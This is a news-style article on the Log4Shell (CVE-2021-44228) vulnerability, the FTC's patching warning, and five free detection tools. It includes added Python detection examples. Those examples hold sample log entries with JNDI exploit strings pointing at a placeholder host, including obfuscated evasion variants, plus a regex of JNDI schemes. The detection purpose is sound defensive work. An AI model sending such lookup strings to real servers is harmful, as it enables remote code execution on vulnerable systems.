Five Best Tools to Keep Log4j Vulnerability Exploitations At Bay

essidsolutions

2022 kicked off with the FTC threatening legal action against companies failing to patch the CVE-2021-44228 vulnerability affecting Log4j. Microsoft also warned about how the Log4j vulnerabilities represent “a complex and high-risk situation for companies across the globe.” Here’s a look at some of the top free tools you can use to patch the vulnerability and secure your software and services from malicious exploitation.

First discovered on December 9, the Apache Log4j or Log4Shell zero-day vulnerability (CVE-2021-44228) involves an exploit affecting Log4j, an open-source Apache library for logging errors and events in Java-based applications. Morphisec’s CTO Michael Gorelik says the exploit “allows threat actors to take over compromised web-facing servers by feeding them a malicious text string.”

The vulnerability affecting Log4j has raised severe concerns worldwide thanks to the scale at which malicious actors can exploit it to target organizations. Within days after the vulnerability was detected, Cisco Talos reported stopping more than 845,000 breach attempts with identified criminal groups accounting for more than 46% of those efforts. Security researchers at Check Point also identified vulnerabilities in more than 40% of business networks worldwide, 88% of them in Europe and the ANZ region.

Over 40% of Log4j Components Downloaded Since December Are Vulnerable

Even though governments worldwide have alerted organizations to the Log4j vulnerability, many organizations remain indifferent to the looming threat. Software security firm Sonatype recently found that the Log4j component was downloaded 10,355,032 times since the vulnerability was discovered, with over 40% of those downloads being critically vulnerable versions.

“The fact that we are still facing such high percentages of vulnerable downloads is indicative of a much bigger problem with supply chain security. If companies don’t understand what’s in their software, they’re unable to act with the requisite speed when threats arise – and in this instance, given the huge popularity of Log4j, this exposes them to significant risk,” says Ilkka Turunen, field CTO, Sonatype.

“Fortunately, there are safe versions of the component available, so for those companies which have acted quickly, their risk has been significantly reduced. However, this needs to serve as an urgent wake-up call that businesses must understand what’s in their software, where dependencies lie, and not leverage vulnerable components when safe ones are available.”


FTC Serves An Ultimatum

The use of vulnerable versions of Log4j, despite safe versions being available, exposes organizations to hacking attempts and to legal action for failing to address the issue. Earlier in January, the Federal Trade Commission (FTC) threatened legal action against companies failing to patch the CVE-2021-44228 vulnerability affecting Log4j. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” it said.

To clarify that it means business, the FTC cited how it forced Equifax to cough up $700 million for failing to patch a known vulnerability in 2019. “A failure to patch a known vulnerability irreversibly exposed the personal information of 147 million consumers. Equifax agreed to pay $700 million to settle actions by the Federal Trade Commission, the Consumer Financial Protection Bureau, and all fifty states,” it said.

The simplest solution for organizations that may have missed the bus is to update their Log4j software to the most current version and to advise third-party subsidiaries to update their respective software. However, it is easier said than done.

According to Microsoft, Log4j vulnerabilities represent “a complex and high-risk situation for companies across the globe as the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications.” There is, therefore, no quick fix, and only advanced scanning capabilities and a robust incident response plan can help organizations tide over the crisis in the months, perhaps years, to come.

So how can organizations find out if their applications and services are vulnerable to Log4j exploits? Let’s look at the top five solutions that developers can use to keep the threat away from their digital infrastructures:

Top Tools to Detect and Mitigate Log4j Exploitations

Microsoft 365 Defender

Microsoft has offered its entire suite of security tools and solutions to help organizations detect and mitigate Log4j exploits inside their networks. These solutions enable users to detect exploitation attempts, remote code execution, and post-exploitation activity. For instance, Microsoft Defender Antivirus leverages cloud-based machine learning to block new and unknown variants and detect components and behaviors related to the Log4j vulnerability in Windows and Linux systems.

Microsoft Defender for Endpoint ensures that executable files are blocked from running unless they meet a prevalence, age, or trusted-list criterion. It also alerts users to signs of post-exploitation, such as coin mining, lateral movement, suspicious remote PowerShell execution, suspicious network connections to a C2 server, hands-on-keyboard attacker activity, and Cobalt Strike.

Microsoft Defender for Cloud Apps helps detect exploitation attempts via cloud applications that use vulnerable Log4j components, and organizations can detect Log4j exploitation attempts via email by activating Microsoft Defender for Office 365. Organizations can also choose from a range of Microsoft security solutions, such as Microsoft Sentinel, Microsoft Defender for IoT, Azure Firewall Premium, and Azure Web Application Firewall (WAF) to detect and defeat Log4j exploitation attempts.

Google’s Cloud Logging detection

Internet giant Google has unveiled its cloud logging detection solution, which helps organizations use the Logs Explorer to detect existing attempts to exploit the Log4j 2 vulnerability. To make the solution efficient, organizations must turn on logs across their IT environments, which expands visibility into activities occurring within the environment. Organizations can create queries in the Logs Explorer to scan for some of the possible exploit strings and can use indexed fields like resource.type, resource.labels, or logName to make the queries run faster.

Organizations can also use security policies by Google Cloud Armor or access control by Identity-Aware Proxy (IAP) to enable mitigation techniques. They can also create log-based alerts to notify their security operation center (SOC) or incident response teams when new log entries match the query. 
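A small Python version of the detection logic such Logs Explorer queries perform, added here as an illustration; it is not Google's own query or code. It assumes constructed sample entries shaped like Cloud Logging records (resource.type, textPayload), filters on the indexed resource type first as the text suggests, and goes a step beyond the text by resolving single-character nested lookups so that a plain match on the JNDI lookup string does not miss trivially reworded variants.

```python
import re

# Constructed sample entries shaped like Cloud Logging JSON (resource.type, textPayload); not real traffic.
SAMPLE_ENTRIES = [
    {"timestamp": "2021-12-10T12:00:01Z", "resource": {"type": "http_load_balancer"},
     "textPayload": 'GET / UA="Mozilla/5.0"'},
    {"timestamp": "2021-12-10T12:00:02Z", "resource": {"type": "http_load_balancer"},
     "textPayload": 'GET / UA="${jndi:ldap://example.invalid/a}"'},
    {"timestamp": "2021-12-10T12:00:03Z", "resource": {"type": "http_load_balancer"},
     "textPayload": 'GET /?q=${${lower:j}ndi:rmi://example.invalid/b}'},
    {"timestamp": "2021-12-10T12:00:04Z", "resource": {"type": "gce_instance"},
     "textPayload": "sshd: accepted publickey for deploy"},
    {"timestamp": "2021-12-10T12:00:05Z", "resource": {"type": "k8s_container"},
     "textPayload": 'X-Api-Version: ${jn${::-d}i:dns://example.invalid/c}'},
]

# Single-character nested lookups (${lower:j}, ${upper:J}, ${x:-j}) evaluate to that character;
# collapsing them first lets one plain search for "${jndi:" cover the usual rewordings.
CHAR_LOOKUP = re.compile(r"\$\{(?:(?:lower|upper):|[^{}]*:-)([^{}])\}", re.IGNORECASE)
# Scheme list is an assumption for the example, not a Google-published list.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://[^}\s\"]*\}?", re.IGNORECASE)


def normalise(payload):
    """Repeatedly resolve nested single-character lookups until the string stops changing."""
    prev = None
    while prev != payload:
        prev, payload = payload, CHAR_LOOKUP.sub(lambda m: m.group(1), payload)
    return payload


def scan_entries(entries, resource_types=("http_load_balancer", "k8s_container")):
    """Cheap indexed-field filter first (as the Logs Explorer advice suggests), then the regex."""
    findings = []
    for entry in entries:
        if entry["resource"]["type"] not in resource_types:
            continue
        hit = JNDI_LOOKUP.search(normalise(entry.get("textPayload", "")))
        if hit:
            findings.append({"timestamp": entry["timestamp"], "resource.type": entry["resource"]["type"],
                             "scheme": hit.group(1).lower(), "lookup": hit.group(0)})
    return findings
```

Each finding carries the timestamp and resource type so it can be forwarded as-is to a log-based alert for the SOC.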

On GitHub, Google also open-sourced log4jscanner, a Log4j vulnerability filesystem scanner and Go package for analyzing JAR files. The tool walks a directory, printing any detected vulnerable JARs to stdout, and lets organizations scan directories on macOS and the entire root filesystem on Linux. Organizations can customize the scanning through the jar.Walker API, based on their specific requirements.


JFrog OSS tools for Log4j

Following the discovery of vulnerabilities in Log4j, the JFrog Security Research team published a set of dedicated Log4j open-source scanning tools for developers to detect Log4j utilization and risk in both their source code and binaries. The JFrog team chose to create passive scanning tools as active scanning tools involve an element of risk. 

“Active Log4j scanning tools attempt to trigger the Log4Shell vulnerability by entering inputs through user-accessible interfaces and seeing the results, without analyzing the data path between the user-accessible interfaces and the potentially vulnerable logging API functions. Therefore, if all attempts at triggering the vulnerability fail, one may erroneously reach the conclusion that the application is safe even though the Log4j vulnerability is still exploitable by entering inputs that were not tested,” the firm said.

According to JFrog, rather than specific file names or metadata, its tools use code classes to diagnose the inclusion of vulnerable code. This way, it does not assume anything about the file names or completeness of build info or vulnerable package databases when scanning for vulnerable code. Developers can also use the firm’s tools to understand how they use Log4j in their applications. This way, developers can assess whether unfiltered user-controlled input may reach Log4j API calls and conclude whether the software was indeed vulnerable before the patch.

WhiteSource Log4j Detect

Open-source security and management company WhiteSource has made available WhiteSource Log4j Detect, a free command-line interface (CLI) tool hosted on GitHub. The tool helps organizations quickly detect and remediate the Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046. WhiteSource says the tool helps developers run quick scans to find vulnerable Log4j versions and seamlessly update them to the latest versions. “As a standalone tool, developers can download the utility that matches their platform, run it within the terminal, and run the scan command on the root folder of the project,” it said.

“Adopting a remediation-first approach and baking security automation into development is the best way to proactively address new and emerging risks to today’s software development organizations.” said Rami Sass, co-founder and CEO of WhiteSource. “By offering this free tool to developers and their teams, we aim to help organizations address these vulnerabilities, and mitigate their impact.”

CrowdStrike Archive Scan Tool

To address the need of organizations worldwide to locate applications using vulnerable versions of Log4j, cybersecurity company CrowdStrike has released a free community tool called the CrowdStrike Archive Scan Tool (CAST). The company says that CAST “performs a targeted search by scanning a given set of directories for JAR, WAR, ZIP and EAR files, and then it performs a deeper scan on those file types matching against a known set of checksums for Log4j libraries.” This method lets the tool find any version of the affected Log4j library, even if it is deeply nested in multiple levels of archive files.

CAST can run on Windows, Mac and Linux systems. Developers can quickly deploy it by downloading the binary to disk and executing it with the directories or files they want to scan. The tool is designed to be single-threaded to limit the impact of scans on system performance, but developers can scan multiple directories simultaneously by executing multiple copies of CAST. 

CrowdStrike says that scans conducted by CAST can bring up several false positives. However, this is intentional, as it wants developers and incident response teams to decide whether a specific result warrants further investigation. “We may see higher false positives because we identify any trace of vulnerable versions of Log4j, even if the vulnerability has been addressed by removing one or more classes from the deployment,” the company said.
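The two passive approaches described for JFrog (matching on bundled code classes rather than file names) and for CAST (checksum matching on archives nested inside archives) share the same core: walk JAR/WAR/EAR/ZIP files recursively. The Python below is an added illustration of that core, written for this article and not the code of either project. It assumes a constructed fixture (a WAR containing a deliberately misnamed JAR with a dummy JndiLookup.class, not real Log4j bytes) and a caller-supplied set of known SHA-256 checksums; the fixture's own hash stands in for the real checksum list, which is not reproduced here.

```python
import hashlib
import io
import tempfile
import zipfile
from pathlib import Path
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# JFrog-style signal: this class, not a file name, is what indicates bundled Log4j 2 JNDI lookup code.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def walk_zip(data, path):
    """Yield (nested path, bytes) for each member, descending into archives inside archives."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = zf.read(info)
            nested = f"{path}!/{info.filename}"
            yield nested, member
            if info.filename.lower().endswith(ARCHIVE_SUFFIXES):
                yield from walk_zip(member, nested)

def scan_archive(path, known_sha256):
    """CAST-style checksum match on every (nested) archive plus a class-presence check on members."""
    data = Path(path).read_bytes()
    findings = []
    for member_path, member in [(str(path), data), *walk_zip(data, str(path))]:
        if member_path.lower().endswith(ARCHIVE_SUFFIXES):
            digest = hashlib.sha256(member).hexdigest()
            if digest in known_sha256:
                findings.append({"path": member_path, "reason": "known-log4j-checksum", "sha256": digest})
        if member_path.endswith(JNDI_LOOKUP_CLASS):
            findings.append({"path": member_path, "reason": "JndiLookup.class present"})
    return findings

def build_sample(directory):
    """Constructed fixture: a WAR nesting a misnamed JAR that carries a dummy JndiLookup.class."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe dummy class bytes, not real Log4j")
    inner_bytes = inner.getvalue()
    war = Path(directory) / "app.war"
    with zipfile.ZipFile(str(war), "w") as z:
        z.writestr("WEB-INF/lib/logging-utils.jar", inner_bytes)  # file name deliberately unhelpful
    return war, hashlib.sha256(inner_bytes).hexdigest()

def demo():
    """Build the fixture in a temp dir, scan it with its own hash as the known set, return results."""
    war, inner_sha = build_sample(tempfile.mkdtemp())
    return scan_archive(war, {inner_sha}), inner_sha
```

Because the class check fires on any copy of JndiLookup.class, it reproduces CAST's intentional false positives: a deployment that has already been mitigated by deleting that class will simply produce no class finding.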
